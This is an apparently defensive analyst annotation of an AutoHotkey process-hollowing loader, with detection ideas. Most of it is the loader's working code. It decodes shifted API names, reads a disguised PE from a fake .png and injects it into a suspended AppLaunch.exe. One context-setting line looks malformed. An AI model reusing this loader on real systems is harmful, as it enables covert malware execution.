; Analyst annotation. AutoHotkey v1-style loader that performs process hollowing
; (MITRE ATT&CK T1055.012): it starts a host executable suspended, replaces its
; image in memory with a PE rebuilt from a data file, and resumes the thread.
; Code tokens are unchanged; only line breaks and comments were added.
;
; Observable artefacts taken from this script:
;   - data file read from C:\Users\Public\a2026.png (comma-separated numbers, not image data)
;   - host process C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
;   - Win32/NT API names stored shifted by +3 and resolved at run time via DllCall
; Detection ideas: an AutoHotkey interpreter parenting AppLaunch.exe created suspended
; with no command line; cross-process memory writes followed by a thread-context change
; and resume; a ".png" under C:\Users\Public that lacks the PNG file signature.
#NoEnv
#NoTrayIcon

; __decode(str): returns str with every character code lowered by 3 (a fixed
; Caesar-style shift). Used only to hide type and API names from static string search.
__decode(str) {
    out := ""
    len := StrLen(str)
    loop % len {
        ch := SubStr(str, A_Index, 1)
        out .= Chr(Asc(ch) - 3)
    }
    return out
}

; LaunchPackedEXE(dummyHost, payloadArray)
;   dummyHost    - path of the executable started as the hollowing target.
;   payloadArray - array of byte values forming a PE image (header offsets used
;                  below match the 32-bit PE32 layout; presumably a 32-bit EXE).
; Returns nothing; calls ExitApp if the host process cannot be created.
LaunchPackedEXE(dummyHost, payloadArray) {
    ; Decoded literals (each character minus 3):
    ;   "swu" = ptr, "lqw" = int, "vkruw" = short, "lqw97" = int64
    ;   pCreate   = CreateProcess          pGetCtx   = GetThreadContext
    ;   pGetCtx64 = Wow64GetThreadContext  pRead     = ReadProcessMemory
    ;   pFree     = ntdll/ZwUnmapViewOfSection
    ;   pAlloc    = VirtualAllocEx         pWrite    = WriteProcessMemory
    ;   pMove     = RtlMoveMemory          pSetCtx   = SetThreadContext
    ;   pSetCtx64 = Wow64SetThreadContext  pResume   = ResumeThread
    ;   pClose    = CloseHandle
    ; This API sequence is the classic hollowing chain and is a useful behavioural signature.
    ptr := __decode("swu")
    i32 := __decode("lqw")
    i16 := __decode("vkruw")
    i64 := __decode("lqw97")
    pCreate := __decode("FuhdwhSurfhvv")
    pGetCtx := __decode("JhwWkuhdgFrqwh{w")
    pGetCtx64 := __decode("Zrz97JhwWkuhdgFrqwh{w")
    pRead := __decode("UhdgSurfhvvPhpru|")
    pFree := __decode("qwgoo2]zXqpdsYlhzRiVhfwlrq")
    pAlloc := __decode("YluwxdoDoorfH{")
    pWrite := __decode("ZulwhSurfhvvPhpru|")
    pMove := __decode("UwoPryhPhpru|")
    pSetCtx := __decode("VhwWkuhdgFrqwh{w")
    pSetCtx64 := __decode("Zrz97VhwWkuhdgFrqwh{w")
    pResume := __decode("UhvxphWkuhdg")
    pClose := __decode("ForvhKdqgoh")
    ; Copy the payload byte array into a contiguous buffer (peData).
    len := payloadArray.Length()
    VarSetCapacity(peData, len)
    Loop % len {
        NumPut(payloadArray[A_Index], &peData, A_Index - 1, "UChar")
    }
    ; sInfo / pInfo are raw buffers passed as the startup-info and process-info
    ; arguments of CreateProcess; the first field of sInfo is set to its size (104).
    VarSetCapacity(sInfo, 104, 0)
    VarSetCapacity(pInfo, 24, 0)
    NumPut(104, sInfo, 0, i32)
    NumPut(0x1, sInfo, 44, i32)
    NumPut(1, sInfo, 48, i16)
    ; Creation-flags argument is 4, i.e. CREATE_SUSPENDED: the host never runs its own code.
    if !DllCall(pCreate, "Str", dummyHost, i32, 0, i32, 0, i32, 0, i32, 0, i32, 4, i32, 0, i32, 0, ptr, &sInfo, ptr, &pInfo) {
        ExitApp
    }
    ; Process and thread handles are read back from the process-info buffer.
    hProc := NumGet(pInfo, 0, ptr)
    hThread := NumGet(pInfo, 8, ptr)
    ; 0x3C is e_lfanew (offset of the PE header); +0x34 is ImageBase in a PE32 optional header.
    imageOffset := NumGet(&peData, 0x3C, i32)
    imageBase := NumGet(&peData, imageOffset + 0x34, i32)
    ; Capture the suspended thread's context. 0x10002 matches CONTEXT_INTEGER in the
    ; x86 CONTEXT layout - TODO confirm against the target architecture.
    ctxSize := 0xB3 * 4
    VarSetCapacity(ctx, ctxSize, 0)
    NumPut(0x10002, ctx, 0, i32)
    if (A_PtrSize = 4)
        DllCall(pGetCtx, ptr, hThread, ptr, &ctx)
    else
        DllCall(pGetCtx64, ptr, hThread, ptr, &ctx)
    ; Offset 0x29*4 (0xA4) is Ebx in the x86 CONTEXT; presumably the PEB address of the
    ; new process, making ebx + 8 the PEB image-base field - consistent with the names used.
    ebx := NumGet(ctx, 0x29 * 4, i32)
    baseAddr := 0
    VarSetCapacity(tmp, 4, 0)
    DllCall(pRead, ptr, hProc, ptr, ebx + 8, ptr, &baseAddr, i32, 4, ptr, &tmp)
    ; Unmap the host's original image only when it sits at the payload's preferred base.
    if (imageBase == baseAddr)
        DllCall(pFree, ptr, hProc, ptr, baseAddr)
    ; +0x50 / +0x54 are SizeOfImage / SizeOfHeaders in the PE32 optional header.
    imgSize := NumGet(&peData, imageOffset + 0x50, i32)
    hdrSize := NumGet(&peData, imageOffset + 0x54, i32)
    ; Remote allocation with 0x3000 (MEM_COMMIT|MEM_RESERVE) and 0x40
    ; (PAGE_EXECUTE_READWRITE); RWX memory in a remote process is a strong EDR signal.
    newBase := DllCall(pAlloc, ptr, hProc, i32, imageBase, i32, imgSize, i32, 0x3000, i32, 0x40)
    ; Write the PE headers, then each section at its virtual address.
    DllCall(pWrite, ptr, hProc, i32, newBase, ptr, &peData, i32, hdrSize, i32, &tmp)
    ; 0xF8 is the offset of the first section header after a PE32 NT header;
    ; +6 is NumberOfSections; each section header is 0x28 bytes.
    sect := imageOffset + 0xF8
    count := NumGet(&peData, imageOffset + 6, i16)
    Loop %count% {
        ; Section header fields: +0xC VirtualAddress, +0x10 SizeOfRawData, +0x14 PointerToRawData.
        va := NumGet(&peData, sect + 0xC, i32)
        sz := NumGet(&peData, sect + 0x10, i32)
        off := NumGet(&peData, sect + 0x14, i32)
        if (sz > 0) {
            VarSetCapacity(tmpSect, sz)
            DllCall(pMove, ptr, &tmpSect, ptr, &peData + off, ptr, sz)
            DllCall(pWrite, ptr, hProc, i32, newBase + va, ptr, &tmpSect, i32, sz, i32, &tmp)
        }
        sect += 0x28
    }
    ; Write the new base address back to the location read earlier (ebx + 8).
    ptrSize := (A_PtrSize = 4) ? 4 : 8
    VarSetCapacity(ptrBuf, ptrSize)
    NumPut(newBase, ptrBuf, 0, (ptrSize = 4) ? i32 : i64)
    DllCall(pWrite, ptr, hProc, i32, ebx + 8, ptr, &ptrBuf, i32, 4, i32, &tmp)
    ; +0x28 is AddressOfEntryPoint. The captured context buffer is edited and then
    ; applied back to the suspended thread before it is resumed.
    entry := NumGet(&peData, imageOffset + 0x28, i32)
    NumPut(0x2C, ctx, newBase + entry, i32)
    if (A_PtrSize = 4)
        DllCall(pSetCtx, ptr, hThread, ptr, &ctx)
    else
        DllCall(pSetCtx64, ptr, hThread, ptr, &ctx)
    DllCall(pResume, ptr, hThread)
    DllCall(pClose, ptr, hThread)
    DllCall(pClose, ptr, hProc)
}

; Entry point. The ".png" is read as text and split on commas; each number is doubled
; and rounded up to give one payload byte, so the file holds an encoded PE rather than
; an image. Hunting pivot: files at this path whose content is comma-separated digits.
payloadPath := "C:\Users\Public\a2026.png"
FileRead, raw, %payloadPath%
segments := StrSplit(raw, ",")
arr := []
Loop % segments.MaxIndex()
    arr.Push(Ceil(segments[A_Index] * 2))
; AppLaunch.exe is a signed .NET Framework binary used here purely as the hollowing host.
LaunchPackedEXE("C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe", arr)